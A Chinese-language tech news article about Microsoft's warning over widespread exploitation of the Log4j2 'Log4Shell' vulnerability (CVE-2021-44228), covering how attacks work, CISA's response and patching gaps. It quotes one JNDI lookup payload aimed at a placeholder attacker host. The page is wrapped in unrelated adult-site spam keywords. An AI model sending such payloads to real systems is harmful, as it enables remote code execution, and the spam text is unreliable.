成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

微軟警告比SolarWinds影響更深遠的Log4j2漏洞利用

安全
這家雷德蒙德科技巨頭指出,世界多地的黑客已開始利用這項更復雜的日志協議技術,來遠程訪問受害者的設備。

[[440760]]

微軟再次發出了來自具有深厚背景的黑客組織的網絡攻擊預警,可知問題源于 Java 日志庫的 Log4j2 漏洞(CVE-2021-44228)。這家雷德蒙德科技巨頭指出,世界多地的黑客已開始利用這項更復雜的日志協議技術,來遠程訪問受害者的設備。目前觀察到的大部分攻擊,主要涉及各路人馬的大規模掃描。

據悉,微軟旗下的多個威脅情報團隊 —— 包括 MSTIC 威脅情報中心、 Microsoft 365 Defender 威脅情報團隊、RiskIQ 和 DART 檢測響應團隊 —— 一直在密切關注 Apache Log4j2 的遠程代碼執行(RCE)漏洞。

CVE-2021-44228 漏洞披露公告指出,被稱作“Log4Shell”的漏洞攻擊,往往在 Web 日志請求中包含如下字符串:

  1. ${jndi:ldap://[attacker site]/a} 

美國網絡安全和基礎設施安全局(CISA)也證實了微軟的說法,此前該機構同樣通報了 Log4Shell 漏洞的廣泛利用。

CISA 負責人 Jen Easterly 于昨日接受 CNN 采訪時重申,若不迅速采取補救措施,各個聯邦機構的設備、服務、乃至整個互聯網,都將處于一個相當可怕的境地。

微軟警告稱,Log4j2 的風險源于兩個方面。其一是漏洞可被輕松利用,其二是基于其構建的產品數量 —— 而 Apache Log4j2 就是當前最流行的 Java 日志庫之一。

據悉,日志庫用于為開發者提供有關服務和產品的附加信息,允許其控制在應用程序執行期間、用戶登錄特定服務 / 設備的錯誤報告,并在遇到功能問題時收集相關數據。

通過日志庫的使用,開發者還可深入了解或收集設備詳情,包括 CPU 類型 / GPU 型號、驅動程序版本、以及系統內存等。

攻擊者會對使用 Log4j2 生成日志的目標系統執行 HTTP 請求,該日志利用 JNDI 向攻擊者控制的站點執行請求,最終導致被利用的進程訪問站點并執行有效負載。

在許多觀察到的案例中,攻擊者往往拿到了 DNS 日志系統的參數,旨在記錄對站點的請求、以對易受攻擊的系統進行指紋識別。

此前已知的一種漏洞利用,涉及微軟旗下的《我的世界》服務器。攻擊者以聊天框作為中部署的消息內容作為管道,試圖滲透用戶系統并奪得控制權。

事實上,全球許多知名企業都面臨著巨大的風險,其中不乏微軟、Twitter、蘋果、亞馬遜、百度、Cloudflare、網易、Cloudflare 等科技巨頭。

網絡安全公司 Check Point 指出,截至目前,其 GitHub 項目的下載量已經超過 40 萬次。遺憾的是,盡管 Apache 已經發布了一個修補程序,但各家公司的實施方案不盡相同。

對于數百上千萬的客戶來說,這意味著他們仍將在未來一段時間里面臨 Log4j 入侵風險,或導致大量用戶數據暴露于在外。

 

責任編輯:趙寧寧 來源: 今日頭條
相關推薦

2021-12-23 11:03:25

Log4j 漏洞漏洞

2022-02-13 23:51:44

DeepfenceLog4j2漏洞

2022-01-27 09:16:08

CPU內存.NET

2021-12-30 08:55:41

Log4j2FastJson漏洞

2022-01-06 09:52:39

Log4j漏洞攻擊

2022-01-11 09:56:15

Log4j2漏洞FTC

2021-12-11 13:29:36

SpringBoot 官方

2025-05-09 09:18:33

2021-12-22 13:52:40

Log4j漏洞谷歌

2021-03-08 17:02:33

微軟漏洞SolarWinds

2021-12-29 06:54:23

Log4j2 漏洞績效

2022-01-24 10:02:53

漏洞微軟網絡攻擊

2021-12-10 15:08:09

Log4j2漏洞日志

2009-04-06 07:06:39

2021-12-20 09:32:55

Log4j2漏洞攻擊

2021-12-14 06:59:39

Apache Log4j2 漏洞

2022-01-10 11:16:40

漏洞 Log4j2Jndi

2021-12-23 15:29:07

Log4j2漏洞阿里云網絡安全

2024-01-12 10:20:52

2021-12-14 23:44:26

漏洞Log4j項目
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 麻豆changesxxx国产| 日韩精品久久久 | 日韩精品成人免费观看视频 | 人人九九精 | 国产1区2区在线观看 | 亚洲欧美日韩精品久久亚洲区 | 国产aaaaav久久久一区二区 | 黄色成人在线观看 | 国内精品成人 | 久草日韩| 99re视频| 成人毛片视频在线播放 | 超碰97人人人人人蜜桃 | 伊人激情网 | 久久久久久国产精品久久 | 日韩欧美中文 | 成人国产精品一级毛片视频毛片 | 久久久久久亚洲 | 国产成人在线视频 | 亚洲精品在线免费 | 一区二区三区国产 | 中文字幕视频在线免费 | 一区二区三区精品视频 | 欧美在线 | 成人av一区| 伊人伊人 | 91成人在线视频 | 亚洲成人免费在线观看 | 日本中文字幕一区 | 国产精品久久久久久久免费观看 | 综合久久久久 | 国产一级淫片免费视频 | 日本粉嫩一区二区三区视频 | 男人的天堂一级片 | 中文字幕国产视频 | 国产一区欧美 | 免费观看毛片 | 成人免费精品视频 | 免费网站在线 | 91在线视频播放 | 亚洲欧美日韩国产综合 |